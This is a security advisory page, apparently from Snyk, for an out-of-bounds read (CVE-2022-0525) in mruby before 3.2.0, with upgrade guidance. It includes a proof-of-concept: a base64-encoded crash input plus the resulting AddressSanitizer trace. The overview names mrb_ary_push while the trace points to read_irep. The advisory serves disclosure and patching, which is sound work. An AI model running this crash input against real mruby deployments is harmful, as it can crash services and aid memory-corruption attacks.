Out-of-bounds Read Affecting mruby/mruby package, versions [,3.2.0)


Severity: high

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

  • Exploit Maturity: Proof of concept
  • EPSS: 0.56% (78th percentile)

  • Snyk ID: SNYK-UNMANAGED-MRUBYMRUBY-5498638
  • published: 8 May 2023
  • disclosed: 8 May 2023
  • credit: alkyne Choi

Introduced: 8 May 2023

CVE-2022-0525
CWE-125

How to fix?

Upgrade mruby/mruby to version 3.2.0 or higher.

Overview

Affected versions of this package are vulnerable to Out-of-bounds Read in mrb_ary_push.

PoC

$ echo -ne "bAticjWSUkRPTkxZC2I9e30MWyohMCxtOjAwLG06MF09MXxbKiEwLG0wXQo=" |base64 -d > poc

# ASAN
$ ./bin/mruby ./poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1083503==ERROR: AddressSanitizer: SEGV on unknown address 0x60c02621407a (pc 0x7f61ffbded80 bp 0x7ffcc7e4fc60 sp 0x7ffcc7e4f3f8 T0)
==1083503==The signal is caused by a READ memory access.
    #0 0x7f61ffbded80  /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memcmp-avx2-movbe.S:182
    #1 0x435d3e in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) (/home/alkyne/fuzzing/mruby-asan/bin/mruby+0x435d3e)
    #2 0x4360b9 in __interceptor_memcmp (/home/alkyne/fuzzing/mruby-asan/bin/mruby+0x4360b9)
    #3 0x4d43b1 in read_irep /home/alkyne/fuzzing/mruby-asan/src/load.c:582:9
    #4 0x4d2aa9 in mrb_proc_read_irep_buf /home/alkyne/fuzzing/mruby-asan/src/load.c:621:10
    #5 0x4d333d in mrb_load_irep_buf_cxt /home/alkyne/fuzzing/mruby-asan/src/load.c:662:25
    #6 0x698007 in mrb_load_detect_file_cxt /home/alkyne/fuzzing/mruby-asan/mrbgems/mruby-compiler/core/parse.y:6945:14
    #7 0x4cf804 in main /home/alkyne/fuzzing/mruby-asan/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
    #8 0x7f61ffa7e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #9 0x41d6ed in _start (/home/alkyne/fuzzing/mruby-asan/bin/mruby+0x41d6ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-eX1tMB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memcmp-avx2-movbe.S:182
==1083503==ABORTING

CVSS Scores

version 3.1